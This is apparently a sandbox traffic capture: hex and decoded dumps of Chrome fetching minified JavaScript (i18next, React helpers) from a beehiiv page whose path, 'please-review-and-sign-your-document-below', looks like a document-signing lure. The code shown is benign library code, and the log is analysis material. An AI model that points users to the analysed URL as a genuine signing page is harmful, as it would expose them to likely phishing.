                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 74 68 69 73 2e 69 6e 69 74 28 65 2c 74 29 7d 69 6e 69 74 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 74 68 69 73 2e 70 72 65 66 69 78 3d 74 2e 70 72 65 66 69 78 7c 7c 22 69 31 38 6e 65 78 74 3a 22 2c 74 68 69 73 2e 6c 6f 67 67 65 72 3d 65 7c 7c 75 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 74 2c 74 68 69 73 2e 64 65 62 75 67 3d 74 2e 64 65 62 75 67 7d 6c 6f 67 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65
                                                                                                                                            Data Ascii: t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.init(e,t)}init(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.prefix=t.prefix||"i18next:",this.logger=e||ue,this.options=t,this.debug=t.debug}log(){for(var e=argume
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 3f 74 2d 31 3a 30 29 2c 6e 3d 31 3b 6e 3c 74 3b 6e 2b 2b 29 73 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 26 26 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 2e 65 6e 74 72 69 65 73 28 29 29 2e 66 6f 72 45 61 63 68 28 61 3d 3e 7b 6c 65 74 5b 6f 2c 6c 5d 3d 61 3b 66 6f 72 28 6c 65 74 20 66 3d 30 3b 66 3c 6c 3b 66 2b 2b 29 6f 28 2e 2e 2e 73 29 7d 29 2c 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 22 2a 22 5d 26 26 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 22 2a 22 5d 2e 65 6e 74 72 69 65 73 28 29 29 2e 66 6f 72 45 61 63 68 28 61 3d 3e 7b 6c 65 74 5b 6f 2c 6c 5d 3d 61 3b 66 6f 72 28 6c 65 74 20 66 3d 30 3b 66 3c 6c 3b 66
                                                                                                                                            Data Ascii: ?t-1:0),n=1;n<t;n++)s[n-1]=arguments[n];this.observers[e]&&Array.from(this.observers[e].entries()).forEach(a=>{let[o,l]=a;for(let f=0;f<l;f++)o(...s)}),this.observers["*"]&&Array.from(this.observers["*"].entries()).forEach(a=>{let[o,l]=a;for(let f=0;f<l;f
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6e 73 74 20 73 20 69 6e 20 65 29 73 21 3d 3d 22 5f 5f 70 72 6f 74 6f 5f 5f 22 26 26 73 21 3d 3d 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 26 26 28 73 20 69 6e 20 69 3f 74 79 70 65 6f 66 20 69 5b 73 5d 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 69 5b 73 5d 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 7c 7c 74 79 70 65 6f 66 20 65 5b 73 5d 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 65 5b 73 5d 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 3f 74 26 26 28 69 5b 73 5d 3d 65 5b 73 5d 29 3a 72 65 28 69 5b 73 5d 2c 65 5b 73 5d 2c 74 29 3a 69 5b 73 5d 3d 65 5b 73 5d 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 43 28 69 29 7b 72 65 74 75 72 6e 20 69 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 5c 2f 5c 7b 5c 7d 5c 28 5c 29 5c 2a 5c 2b 5c 3f 5c 2e 5c
                                                                                                                                            Data Ascii: nst s in e)s!=="__proto__"&&s!=="constructor"&&(s in i?typeof i[s]=="string"||i[s]instanceof String||typeof e[s]=="string"||e[s]instanceof String?t&&(i[s]=e[s]):re(i[s],e[s],t):i[s]=e[s]);return i}function C(i){return i.replace(/[\-\[\]\/\{\}\(\)\*\+\?\.\
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 22 62 6f 6f 6c 65 61 6e 22 5d 2e 69 6e 64 65 78 4f 66 28 74 79 70 65 6f 66 20 61 29 3e 2d 31 26 26 6c 3c 73 2e 6c 65 6e 67 74 68 2d 31 29 63 6f 6e 74 69 6e 75 65 3b 72 2b 3d 6c 2d 72 2b 31 3b 62 72 65 61 6b 7d 6e 3d 61 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 48 28 69 29 7b 72 65 74 75 72 6e 20 69 26 26 69 2e 69 6e 64 65 78 4f 66 28 22 5f 22 29 3e 30 3f 69 2e 72 65 70 6c 61 63 65 28 22 5f 22 2c 22 2d 22 29 3a 69 7d 63 6c 61 73 73 20 71 20 65 78 74 65 6e 64 73 20 4a 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 6e 73 3a 5b 22 74 72 61 6e 73 6c 61 74 69 6f
                                                                                                                                            Data Ascii: "boolean"].indexOf(typeof a)>-1&&l<s.length-1)continue;r+=l-r+1;break}n=a}return n}function H(i){return i&&i.indexOf("_")>0?i.replace("_","-"):i}class q extends J{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{ns:["translatio
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 26 26 28 6f 3d 6f 2e 63 6f 6e 63 61 74 28 61 3f 73 2e 73 70 6c 69 74 28 61 29 3a 73 29 29 2c 65 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 3e 2d 31 26 26 28 6f 3d 65 2e 73 70 6c 69 74 28 22 2e 22 29 2c 6e 3d 74 2c 74 3d 6f 5b 31 5d 29 2c 74 68 69 73 2e 61 64 64 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 58 28 74 68 69 73 2e 64 61 74 61 2c 6f 2c 6e 29 2c 72 2e 73 69 6c 65 6e 74 7c 7c 74 68 69 73 2e 65 6d 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 73 2c 6e 29 7d 61 64 64 52 65 73 6f 75 72 63 65 73 28 65 2c 74 2c 73 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 7b 73 69 6c 65 6e 74 3a 21 31 7d 3b 66 6f 72 28 63 6f 6e 73
                                                                                                                                            Data Ascii: &&(o=o.concat(a?s.split(a):s)),e.indexOf(".")>-1&&(o=e.split("."),n=t,t=o[1]),this.addNamespaces(t),X(this.data,o,n),r.silent||this.emit("added",e,t,s,n)}addResources(e,t,s){let n=arguments.length>3&&arguments[3]!==void 0?arguments[3]:{silent:!1};for(cons
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6f 72 45 61 63 68 28 72 3d 3e 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 73 5b 72 5d 26 26 28 65 3d 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 73 5b 72 5d 2e 70 72 6f 63 65 73 73 28 65 2c 74 2c 73 2c 6e 29 29 7d 29 2c 65 7d 7d 3b 63 6f 6e 73 74 20 5f 3d 7b 7d 3b 63 6c 61 73 73 20 7a 20 65 78 74 65 6e 64 73 20 4a 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 73 75 70 65 72 28 29 2c 66 65 28 5b 22 72 65 73 6f 75 72 63 65 53 74 6f 72 65 22 2c 22 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 22 2c 22 70 6c 75 72 61 6c 52 65 73 6f 6c 76 65 72 22 2c 22 69 6e 74 65 72 70 6f 6c
                                                                                                                                            Data Ascii: orEach(r=>{this.processors[r]&&(e=this.processors[r].process(e,t,s,n))}),e}};const _={};class z extends J{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};super(),fe(["resourceStore","languageUtils","pluralResolver","interpol
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 61 74 69 6f 6e 4f 70 74 69 6f 6e 48 61 6e 64 6c 65 72 28 61 72 67 75 6d 65 6e 74 73 29 29 2c 74 79 70 65 6f 66 20 74 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 3d 7b 2e 2e 2e 74 7d 29 2c 74 7c 7c 28 74 3d 7b 7d 29 2c 65 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 22 22 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 7c 7c 28 65 3d 5b 53 74 72 69 6e 67 28 65 29 5d 29 3b 63 6f 6e 73 74 20 6e 3d 74 2e 72 65 74 75 72 6e 44 65 74 61 69 6c 73 21 3d 3d 76 6f 69 64 20 30 3f 74 2e 72 65 74 75 72 6e 44 65 74 61 69 6c 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 44 65 74 61 69 6c 73 2c 72 3d 74 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 21 3d 3d 76 6f 69 64 20 30 3f 74 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6b 65
                                                                                                                                            Data Ascii: ationOptionHandler(arguments)),typeof t=="object"&&(t={...t}),t||(t={}),e==null)return"";Array.isArray(e)||(e=[String(e)]);const n=t.returnDetails!==void 0?t.returnDetails:this.options.returnDetails,r=t.keySeparator!==void 0?t.keySeparator:this.options.ke
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 28 64 2c 75 2c 7b 2e 2e 2e 74 2c 6e 73 3a 6f 7d 29 3a 60 6b 65 79 20 27 24 7b 61 7d 20 28 24 7b 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 7d 29 27 20 72 65 74 75 72 6e 65 64 20 61 6e 20 6f 62 6a 65 63 74 20 69 6e 73 74 65 61 64 20 6f 66 20 73 74 72 69 6e 67 2e 60 3b 72 65 74 75 72 6e 20 6e 3f 28 68 2e 72 65 73 3d 79 2c 68 2e 75 73 65 64 50 61 72 61 6d 73 3d 74 68 69 73 2e 67 65 74 55 73 65 64 50 61 72 61 6d 73 44 65 74 61 69 6c 73 28 74 29 2c 68 29 3a 79 7d 69 66 28 72 29 7b 63 6f 6e 73 74 20 79 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 75 29 2c 4f 3d 79 3f 5b 5d 3a 7b 7d 2c 77 3d 79 3f 63 3a 64 3b
                                                                                                                                            Data Ascii: urnedObjectHandler?this.options.returnedObjectHandler(d,u,{...t,ns:o}):`key '${a} (${this.language})' returned an object instead of string.`;return n?(h.res=y,h.usedParams=this.getUsedParamsDetails(t),h):y}if(r){const y=Array.isArray(u),O=y?[]:{},w=y?c:d;
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 65 79 53 65 70 61 72 61 74 6f 72 3a 20 66 61 6c 73 65 20 6f 6e 20 69 6e 69 74 20 6f 72 20 6d 61 6b 65 20 73 75 72 65 20 79 6f 75 72 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 20 61 72 65 20 70 75 62 6c 69 73 68 65 64 20 69 6e 20 6e 65 73 74 65 64 20 66 6f 72 6d 61 74 2e 22 29 7d 6c 65 74 20 45 3d 5b 5d 3b 63 6f 6e 73 74 20 54 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 67 65 74 46 61 6c 6c 62 61 63 6b 43 6f 64 65 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 61 6c 6c 62 61 63 6b 4c 6e 67 2c 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3b 69 66 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 54 6f 3d 3d 3d 22 66 61 6c 6c 62 61 63 6b 22 26 26 54 26 26 54 5b 30 5d 29 66 6f 72 28 6c 65 74 20 4c 3d 30
                                                                                                                                            Data Ascii: eySeparator: false on init or make sure your translations are published in nested format.")}let E=[];const T=this.languageUtils.getFallbackCodes(this.options.fallbackLng,t.lng||this.language);if(this.options.saveMissingTo==="fallback"&&T&&T[0])for(let L=0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            30192.168.2.1649745104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC552OUTGET /assets/context-CxfOs_9L.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1435
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"59b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89e7967c352-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 32 65 32 33 31 62 63 2d 39 66 65 34 2d 35 38 34 35 2d 38 62 63 30 2d 35 63 34 64 36 36 37 66 64 33 38 36 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e2e231bc-9fe4-5845-8bc0-5c4d667fd386")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC963INData Raw: 2c 22 26 23 36 32 3b 22 3a 22 3e 22 2c 22 26 61 70 6f 73 3b 22 3a 22 27 22 2c 22 26 23 33 39 3b 22 3a 22 27 22 2c 22 26 71 75 6f 74 3b 22 3a 27 22 27 2c 22 26 23 33 34 3b 22 3a 27 22 27 2c 22 26 6e 62 73 70 3b 22 3a 22 20 22 2c 22 26 23 31 36 30 3b 22 3a 22 20 22 2c 22 26 63 6f 70 79 3b 22 3a 22 c2 a9 22 2c 22 26 23 31 36 39 3b 22 3a 22 c2 a9 22 2c 22 26 72 65 67 3b 22 3a 22 c2 ae 22 2c 22 26 23 31 37 34 3b 22 3a 22 c2 ae 22 2c 22 26 68 65 6c 6c 69 70 3b 22 3a 22 e2 80 a6 22 2c 22 26 23 38 32 33 30 3b 22 3a 22 e2 80 a6 22 2c 22 26 23 78 32 46 3b 22 3a 22 2f 22 2c 22 26 23 34 37 3b 22 3a 22 2f 22 7d 2c 63 3d 65 3d 3e 70 5b 65 5d 2c 75 3d 65 3d 3e 65 2e 72 65 70 6c 61 63 65 28 72 2c 63 29 3b 6c 65 74 20 74 3d 7b 62 69 6e 64 49 31 38 6e 3a 22 6c 61 6e 67 75
                                                                                                                                            Data Ascii: ,"&#62;":">","&apos;":"'","&#39;":"'","&quot;":'"',"&#34;":'"',"&nbsp;":" ","&#160;":" ","&copy;":"","&#169;":"","&reg;":"","&#174;":"","&hellip;":"","&#8230;":"","&#x2F;":"/","&#47;":"/"},c=e=>p[e],u=e=>e.replace(r,c);let t={bindI18n:"langu


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            31192.168.2.1649744104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC847OUTGET /assets/PageProvider-uKxoiNdl.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1569
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"621-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89e5af10f9d-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 35 62 38 64 30 38 31 2d 34 32 32 39 2d 35 31 64 30 2d 61 30 36 66 2d 33 63 61 63 66 35 37 30 38 37 32 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f5b8d081-4229-51d0-a06f-3cacf570872c")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1112INData Raw: 6c 22 2c 65 29 29 28 64 7c 7c 7b 7d 29 3b 63 6f 6e 73 74 20 66 3d 65 3d 3e 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 20 2f 67 2c 22 2b 22 29 3a 22 22 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 72 29 7b 63 6f 6e 73 74 5b 73 2c 6f 5d 3d 63 2e 75 73 65 53 74 61 74 65 28 28 29 3d 3e 7b 69 66 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3e 22 75 22 29 72 65 74 75 72 6e 20 72 3b 74 72 79 7b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 65 29 3b 72 65 74 75 72 6e 20 74 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 3a 72 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 74 29 2c 72 7d 7d 29 3b 72 65 74 75 72 6e 5b 73 2c 74 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74
                                                                                                                                            Data Ascii: l",e))(d||{});const f=e=>e?e.replace(/ /g,"+"):"";function E(e,r){const[s,o]=c.useState(()=>{if(typeof window>"u")return r;try{const t=window.localStorage.getItem(e);return t?JSON.parse(t):r}catch(t){return console.error(t),r}});return[s,t=>{try{const n=t


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            32192.168.2.1649746104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC843OUTGET /assets/useToast-DK42uF07.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 608
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"260-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89edf5ff799-EWR
